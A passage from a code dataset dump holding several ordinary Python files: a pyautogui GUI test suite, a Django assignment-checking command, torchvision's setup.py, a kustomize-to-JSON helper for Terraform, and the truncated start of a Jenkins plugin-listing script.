FileNotFoundError:\n print(\"[There's no such directory]\")\n\n try:\n self.cwd = os.getcwd() # for printing the current directory\n # print(self.cwd)\n os.mkdir(\"US01\")\n os.chdir(\"US01\") # cd to the directory for saving screenshots\n self.storage = '%s/' % os.getcwd() # escape the cwd string\n except:\n print(\"[Something is wrong when creating the directory]\")\n\n @classmethod\n def tearDownClass(self):\n \"\"\" End the test, determine if tests succeed or fail\n Then, rename the folder.\n \"\"\"\n file_list = os.listdir()\n # print(file_list)\n # iterate through the filename string, if there's a keyword \"fail\", rename the folder\n for filename in file_list:\n if \"fail\" in filename:\n # print(\"Some tests failed\")\n os.chdir(\"..\")\n os.rename(\"US01\", \"US01 Fail\")\n return\n os.chdir(\"..\")\n os.rename(\"US01\", \"US01 Success\")\n # print(\"All tests passed\")\n\n def test_a_add_new_client(self):\n ''' add a new client '''\n try:\n # The pyautogui doesn't recognize the pop up window -> use the coordination\n btn_add_new_client = pg.locateOnScreen(\n os.path.join(CWD, 'screenshot' ,'main_win' ,'add_new_client.png'),\n grayscale=False, confidence=.9)\n\n pg.moveTo(btn_add_new_client)\n pg.click()\n except:\n print(\"[There's no such button matching the picture]\")\n raise\n # add a new client\n try:\n pg.moveTo(942, 464, 0.6) # cal number\n pg.click()\n pg.write(\"CAL00004\")\n\n pg.moveTo(942, 502, 0.6) # client name\n pg.click()\n pg.write(\"Test client name\")\n\n pg.moveTo(942, 540, 0.6) # address 1\n pg.click()\n pg.write(\"Test client address1\")\n\n pg.moveTo(942, 577, 0.6) # address 2\n pg.click()\n pg.write(\"Test client address2\")\n\n pg.moveTo(942, 634, 0.6)\n pg.click()\n except:\n print(\"[There's somthing wrong]\")\n # locate the picture to see whether it exists\n try:\n pg.locateOnScreen(os.path.join(CWD,'screenshot', 'main_win', 'cal_CAL0004.png'))\n # succeeds, screenshot the application\n try:\n pg.screenshot(\n os.path.join(CWD,'US01', 'test add_new_client success .png'),\n region=(520, 127, (1405-520), 
(870-127))\n                )\n            except:\n                print(\"[Fail to locate the folder]\")\n        except:\n            print(\"[Fail to find the picture or add new client function fails]\")\n            pg.screenshot(\n                os.path.join(CWD,'US01', 'test add_new_client fail .png'),\n                region=(520, 127, (1405-520), (870-127))\n            )\n            raise\n\n    def test_b_add_equipment(self):\n        ''' add an equipment; the information shows up on the GUI screen correctly '''\n        # choose a client to add an equipment\n        try:\n            pg.moveTo(632, 487, 0.7)\n            pg.click()\n\n            btn_choose_client = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot' ,'main_win' ,'choose_client.png'),\n                grayscale=False, confidence=.9)\n            pg.moveTo(btn_choose_client)\n            pg.click()\n        except:\n            print(\"[Fail to find the picture or choose function fails]\")\n            raise\n\n        # move to the button\n        try:\n            btn_add_new_equipment = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot' ,'main_win_info' ,'info_add_new_equipment.png'),\n                grayscale=False, confidence=.9)\n            pg.moveTo(btn_add_new_equipment)\n            pg.click()\n        except:\n            print(\"[Fail to find the picture or add new equipment function fails]\")\n            raise\n        # finish adding the equipment\n        try:\n            pg.moveTo(947, 473, 0.7)\n            pg.click()\n            pg.write(\"1234\")\n\n            pg.moveTo(999, 513, 0.7)\n            pg.click()\n            pg.write(\"test mode\")\n\n            pg.moveTo(962, 540, 0.7) # submit\n            pg.click()\n        except:\n            print(\"[Fail to find the picture or add new equipment function fails]\")\n            raise\n\n        try:\n            pg.locateOnScreen(os.path.join(CWD, 'screenshot', 'main_win_info', 'info_id.png'))\n            # print(result) # if successful, would print out the box area\n            try:\n                pg.screenshot(\n                    os.path.join(CWD,'US01', 'test add_new_equipment success .png'),\n                    region=(520, 127, (1405-520), (870-127))\n                )\n            except:\n                print(\"[Fail to locate the folder]\")\n        except:\n            print(\"[Fail to find the picture or add new equipment function fails]\")\n            pg.screenshot(\n                os.path.join(CWD,'US01', 'test add_new_equipment fail .png'),\n                region=(520, 127, (1405-520), (870-127))\n            )\n            raise\n\n    def test_c_add_new_run(self):\n        ''' add a pair of files to a run, timestamp marked, information on screen '''\n\n        # check whether the equipment info is correct\n        try:\n            pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win', 'cal_CAL0004.png'),\n                grayscale=False,\n                confidence = .7\n            )\n        except:\n            raise Exception(\"[CAL Number incorrect, or cannot locate the picture]\")\n        try:\n            pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win_info', 'info_client_name.png'),\n                grayscale=False,\n                confidence = .7\n            )\n        except:\n            raise Exception(\"[client name incorrect, or cannot locate the picture]\")\n        try:\n            pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win_info', 'info_serial.png'),\n                grayscale=False,\n                confidence = .7\n            )\n        except:\n            raise Exception(\"[serial number incorrect, or cannot locate the picture]\")\n        try:\n            pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win_info', 'info_id.png'),\n                grayscale=False,\n                confidence = .7\n            )\n        except:\n            raise Exception(\"[id incorrect, or cannot locate the picture]\")\n\n        # if all data correctly shown on the form, choose an equipment to add new run\n        try:\n            pg.moveTo(604, 606, 0.7)\n            pg.click()\n\n            btn_choose_equipment = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot' ,'main_win_info' ,'info_choose_equipment.png'),\n                grayscale=False, confidence=.9)\n\n            pg.moveTo(btn_choose_equipment)\n            pg.click()\n        except:\n            print(\"[Fail to find the picture or choose equipment function fails]\")\n            raise\n\n        # go on testing the add new run functions\n        try:\n            btn_add_new_run = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 
'main_win_equip', 'equip_add_new_run.png'),\n                grayscale=False,\n                confidence = .9\n            )\n\n            pg.moveTo(btn_add_new_run)\n            pg.click()\n        except:\n            raise Exception(\"cannot locate the add new run button\")\n\n        # check that the submit is successful\n        try:\n            pg.moveTo(674, 470, 0.7) # client file\n            pg.click()\n\n            pg.moveTo(977, 560, 0.7) # file\n            pg.click()\n\n            pg.moveTo(1281, 912, 0.7) # open\n            pg.click()\n\n            pg.moveTo(669, 539, 0.7) # lab file\n            pg.click()\n\n            pg.moveTo(907, 589, 0.7) # file\n            pg.click()\n\n            pg.moveTo(1281, 912, 0.7)\n            pg.click()\n\n            pg.moveTo(967, 601, 0.7) #submit\n            pg.click()\n\n            pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win', 'cal_CAL0004.png'),\n                grayscale=False,\n                confidence = .7\n            )\n            try:\n                pg.screenshot(\n                    os.path.join(CWD,'US01', 'test add_new_run success .png'),\n                    region=(520, 127, (1405-520), (870-127))\n                )\n            except:\n                print(\"[Fail to locate the folder]\")\n        except:\n            pg.screenshot(\n                os.path.join(CWD,'US01', 'test add_new_run fail .png'),\n                region=(520, 127, (1405-520), (870-127))\n            )\n            raise Exception(\"[CAL Number incorrect, or cannot locate the picture, or submit fails]\")\n\n    def test_d_delete_run(self):\n        ''' delete a run in the equipment page '''\n        try:\n            pg.moveTo(685, 568, 0.7) # row data\n            pg.click()\n\n            btn_del = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_del_run.png'),\n                grayscale=False,\n                confidence = .9\n            )\n            pg.moveTo(btn_del)\n            pg.click()\n\n            pg.moveTo(933, 534, 0.7) # confirm delete the run\n            pg.click()\n\n            # if the data id cannot be found, the data has been deleted successfully\n            # directly screenshot the data id for scanning\n            try:\n                # data\n                data_x = 543\n                data_y = 555\n                pg.screenshot(\n                    os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_data.png'),\n                    region=(\n                        data_x,\n                        data_y,\n                        (817 - data_x),\n                        (587 - data_y)\n                    )\n                )\n                # print(data)\n            except:\n                print(\"[Saving file failed]\")\n\n            sleep(1) # prepare for picture locating\n            try:\n                data = pg.locateOnScreen(\n                    os.path.join(CWD, 'screenshot', 'main_win_equip', 'equip_data.png'),\n                    grayscale=False,\n                )\n                if data is None:\n                    print(\"[Data successfully deleted]\")\n                    sleep(1) # pop window image get screenshot\n                    pg.screenshot(\n                        os.path.join(CWD,'US01', 'test_delete_run success .png'),\n                        region=(520, 127, (1405-520), (870-127))\n                    )\n                else:\n                    print(\"[Data deletion failed]\")\n                    pg.screenshot(\n                        os.path.join(CWD,'US01', 'test_delete_run fail .png'),\n                        region=(520, 127, (1405-520), (870-127))\n                    )\n            except:\n                print(\"[Fail to locate the filepath]\")\n\n        except:\n            pg.screenshot(\n                os.path.join(CWD,'US01', 'test_delete_run fail .png'),\n                region=(520, 127, (1405-520), (870-127))\n            )\n            raise Exception(\"[Data deletion failed]\")\n\n    def test_e_del_client(self):\n        \"\"\"Return to homepage to delete a client\n        \"\"\"\n        try:\n            btn_home = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win_info', 'info_home.png'),\n                grayscale=False,\n                confidence = .8\n            )\n            pg.moveTo(btn_home)\n            pg.click()\n            sleep(1)\n        except:\n            raise Exception(\"[Fail to find the picture or home function fails]\")\n\n        try:\n            pg.moveTo(669, 484, 0.7) # select one client\n            pg.click()\n\n            pg.moveTo(1235, 387, 0.7) # delete client button, fail to capture the picture\n            pg.click()\n\n            pg.moveTo(941, 533, 0.7)\n            pg.click()\n        except:\n            raise Exception(\"[Fail to find the picture or delete function fails]\")\n\n        sleep(1) # for the picture locating precision\n        try:\n            image = pg.locateOnScreen(\n                os.path.join(CWD, 'screenshot', 'main_win', 'cal_CAL0004.png'),\n                grayscale=False,\n                confidence = .9\n            )\n            # if image cannot be found, it would be 
None; otherwise screenshot the failure\n            if image is None:\n                print(\"[The client has been deleted successfully]\")\n                try:\n                    pg.screenshot(\n                        os.path.join(CWD,'US01', 'test_del_client success .png'),\n                        region=(520, 127, (1405-520), (870-127))\n                    )\n                except:\n                    print(\"[Fail to locate the folder]\")\n            else:\n                print(\"[Fail to delete the client, or the picture detection failed]\")\n                pg.screenshot(\n                    os.path.join(CWD,'US01', 'test_del_client fail .png'),\n                    region=(520, 127, (1405-520), (870-127))\n                )\n        except:\n            print(\"[Fail to locate the filepath]\")\n\n# test the client update button -> manually, successful\nif __name__ == '__main__':\n    suite = unittest.TestLoader().loadTestsFromTestCase(TestUserStory1)\n    unittest.TextTestRunner(verbosity=2).run(suite)\n", "sub_path": "gui_testing/test_US01.py", "file_name": "test_US01.py", "file_ext": "py", "file_size_in_byte": 12680, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 23, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 36, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 41, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 42, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 47, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 48, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 53, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 56, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 57, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 66, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 72, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 73, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 75, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 76, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 87, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 88, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 94, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 95, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 96, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 98, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 99, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 100, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 102, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 103, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 104, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 106, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 107, "usage_type": "call"}, {"api_name": "pyautogui.write", 
"line_number": 108, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 110, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 111, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 137, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 138, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 143, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 144, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 154, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 155, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 161, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 162, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 163, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 165, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 166, "usage_type": "call"}, {"api_name": "pyautogui.write", "line_number": 167, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 169, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 170, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 198, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 207, "usage_type": "call"}, {"api_name": "os.path", "line_number": 207, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", 
"line_number": 214, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 215, "usage_type": "call"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 232, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 233, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 239, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 240, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 247, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path", "line_number": 248, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 253, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 254, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 260, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 261, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 263, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 264, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 266, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 267, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 269, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 270, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 272, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 273, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 275, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 276, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 278, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 279, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 281, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 288, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 295, "usage_type": "call"}, {"api_name": "os.path", "line_number": 295, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 303, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 304, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 307, "usage_type": "call"}, {"api_name": "os.path", "line_number": 307, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 311, "usage_type": "call"}, {"api_name": "pyautogui.click", 
"line_number": 312, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 314, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 315, "usage_type": "call"}, {"api_name": "pyautogui.screenshot", "line_number": 323, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 324, "usage_type": "call"}, {"api_name": "os.path", "line_number": 324, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 336, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 344, "usage_type": "call"}, {"api_name": "pyautogui.screenshot", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path", "line_number": 346, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 369, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 370, "usage_type": "call"}, {"api_name": "os.path", "line_number": 370, "usage_type": "attribute"}, {"api_name": "pyautogui.moveTo", "line_number": 374, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 375, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 376, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 381, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 382, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 384, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 385, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 387, "usage_type": "call"}, {"api_name": "pyautogui.click", "line_number": 388, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 392, "usage_type": "call"}, {"api_name": "pyautogui.locateOnScreen", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 395, "usage_type": "call"}, {"api_name": "os.path", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 403, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 404, "usage_type": "call"}, {"api_name": "os.path", "line_number": 404, "usage_type": "attribute"}, {"api_name": "pyautogui.screenshot", "line_number": 411, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path", "line_number": 412, "usage_type": "attribute"}, {"api_name": "unittest.TestLoader", "line_number": 420, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 421, "usage_type": "call"}]}
+{"seq_id": "390075539", "text": "from django.core.management.base import BaseCommand\n\nfrom decimal import Decimal\n\nfrom sakila import assignments\n\n\nEXPECTED_RESULTS = {\n 'assignment_1': 1000,\n 'assignment_2': 211,\n 'assignment_3': ['Mike Hillyer'],\n 'assignment_4': 'ELEANOR HUNT',\n 'assignment_5': 'Sports',\n 'assignment_6': [(1, Decimal('33679.79')), (2, Decimal('33726.77'))],\n 'assignment_7': [u'Aurora', u'London', u'Saint-Denis', u'Cape Coral'],\n 'assignment_8': [\n (u'English', 1000),\n (u'Italian', 0),\n (u'Japanese', 0),\n (u'Mandarin', 0),\n (u'French', 0),\n (u'German', 0)\n ],\n 'assignment_9': 'BUCKET BROTHERHOOD'\n}\n\n\nclass Command(BaseCommand):\n help = ''\n\n def handle(self, *args, **options):\n for func, expected_result in EXPECTED_RESULTS.items():\n exec_result = getattr(assignments, func)()\n try:\n assert exec_result == expected_result\n except AssertionError:\n print('Test \"{}\" failed. Expected \"{}\", but got \"{}\"'.format(\n func, expected_result, exec_result))\n print('All tests passing!')\n", "sub_path": "rmotr_sakila/sakila/management/commands/runtests.py", "file_name": "runtests.py", "file_ext": "py", "file_size_in_byte": 1144, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "decimal.Decimal", "line_number": 14, "usage_type": "call"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 28, "usage_type": "name"}, {"api_name": "sakila.assignments", "line_number": 33, "usage_type": "argument"}]}
+{"seq_id": "379175944", "text": "from __future__ import print_function\nimport os\nimport io\nimport re\nimport sys\nfrom setuptools import setup, find_packages\nfrom pkg_resources import get_distribution, DistributionNotFound\nimport subprocess\n\n\ndef read(*names, **kwargs):\n with io.open(\n os.path.join(os.path.dirname(__file__), *names),\n encoding=kwargs.get(\"encoding\", \"utf8\")\n ) as fp:\n return fp.read()\n\n\ndef get_dist(pkgname):\n try:\n return get_distribution(pkgname)\n except DistributionNotFound:\n return None\n\n\nversion = '0.2.3a0'\nsha = 'Unknown'\npackage_name = os.getenv('TORCHVISION_PACKAGE_NAME', 'torchvision')\n\ncwd = os.path.dirname(os.path.abspath(__file__))\n\ntry:\n sha = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=cwd).decode('ascii').strip()\nexcept Exception:\n pass\n\nif os.getenv('TORCHVISION_BUILD_VERSION'):\n assert os.getenv('TORCHVISION_BUILD_NUMBER') is not None\n build_number = int(os.getenv('TORCHVISION_BUILD_NUMBER'))\n version = os.getenv('TORCHVISION_BUILD_VERSION')\n if build_number > 1:\n version += '.post' + str(build_number)\nelif sha != 'Unknown':\n version += '+' + sha[:7]\nprint(\"Building wheel {}-{}\".format(package_name, version))\n\n\ndef write_version_file():\n version_path = os.path.join(cwd, 'torchvision', 'version.py')\n with open(version_path, 'w') as f:\n f.write(\"__version__ = '{}'\\n\".format(version))\n f.write(\"git_version = {}\\n\".format(repr(sha)))\n\n\nwrite_version_file()\n\nreadme = open('README.rst').read()\n\npytorch_package_name = os.getenv('TORCHVISION_PYTORCH_DEPENDENCY_NAME', 'torch')\n\nrequirements = [\n 'numpy',\n 'six',\n pytorch_package_name,\n]\n\npillow_ver = ' >= 4.1.1'\npillow_req = 'pillow-simd' if get_dist('pillow-simd') is not None else 'pillow'\nrequirements.append(pillow_req + pillow_ver)\n\n\nsetup(\n # Metadata\n name=package_name,\n version=version,\n author='PyTorch Core Team',\n author_email='soumith@pytorch.org',\n url='https://github.com/pytorch/vision',\n description='image and video datasets and models for torch deep learning',\n long_description=readme,\n license='BSD',\n\n # Package info\n packages=find_packages(exclude=('test',)),\n\n zip_safe=True,\n install_requires=requirements,\n extras_require={\n \"scipy\": [\"scipy\"],\n },\n)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "io.open", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "pkg_resources.get_distribution", "line_number": 21, "usage_type": "call"}, {"api_name": "pkg_resources.DistributionNotFound", "line_number": 22, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 30, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 33, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 38, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 39, "usage_type": "call"}, 
{"api_name": "os.getenv", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 59, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 72, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "419771559", "text": "import json\nimport subprocess\n\n\n# Get Kustomize manifests\nresult = subprocess.run([\"bash\", \"-c\", \"kubectl kustomize manifests/env/provision\"], stdout=subprocess.PIPE)\n\ndata_obj ={\n \"data\": result.stdout.decode(\"utf-8\")\n}\nprint(json.dumps(data_obj))\n", "sub_path": "scripts/terraform/scripts/external_kustomize_manifest.py", "file_name": "external_kustomize_manifest.py", "file_ext": "py", "file_size_in_byte": 252, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "subprocess.run", "line_number": 6, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 6, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 11, "usage_type": "call"}]}
+{"seq_id": "213766232", "text": "import sys\nimport argparse\nimport requests\nimport xml.etree.ElementTree as ET\n\nJENKINS_BASE_URL = \"http://localhost:8080\"\nJENKINS_PLUGIN_MANAGER_PATH = \"pluginManager/api/xml?depth=1\"\nDEFAULT_CHUNK_SIZE = 20\nTAGS = {\n \"VERSION\": \"version\",\n \"SHORT_NAME\": \"shortName\"\n}\n\n\ndef main():\n arg_parser = argparse.ArgumentParser(\n prog=\"list-jenkins-plugins\",\n description=\"snapshot list of installed plugins on a Jenkins instance in plugins.txt format\"\n )\n arg_parser.add_argument(\n \"jenkins_base_url\",\n nargs=\"?\",\n default=JENKINS_BASE_URL,\n help=\"Jenkins instance base url. Defaults to {}\".format(JENKINS_BASE_URL)\n ),\n arg_parser.add_argument(\n \"--user\", \"-u\",\n default=\"\"\n ),\n arg_parser.add_argument(\n \"--password\", \"-p\",\n default=\"\"\n ),\n arg_parser.add_argument(\n \"--chunk-size\", \"-c\",\n type=int,\n default=DEFAULT_CHUNK_SIZE,\n help=\"Jenkins response streaming chunks size. Defaults to {} kB\".format(DEFAULT_CHUNK_SIZE)\n )\n args = arg_parser.parse_args()\n return parse_xml_plugins_list(args.jenkins_base_url, args.chunk_size, (args.user, args.password))\n\n\ndef parse_xml_plugins_list(jenkins_base_url, chunk_size, auth):\n chunk_size = chunk_size * 1024\n xml_pull_parser = 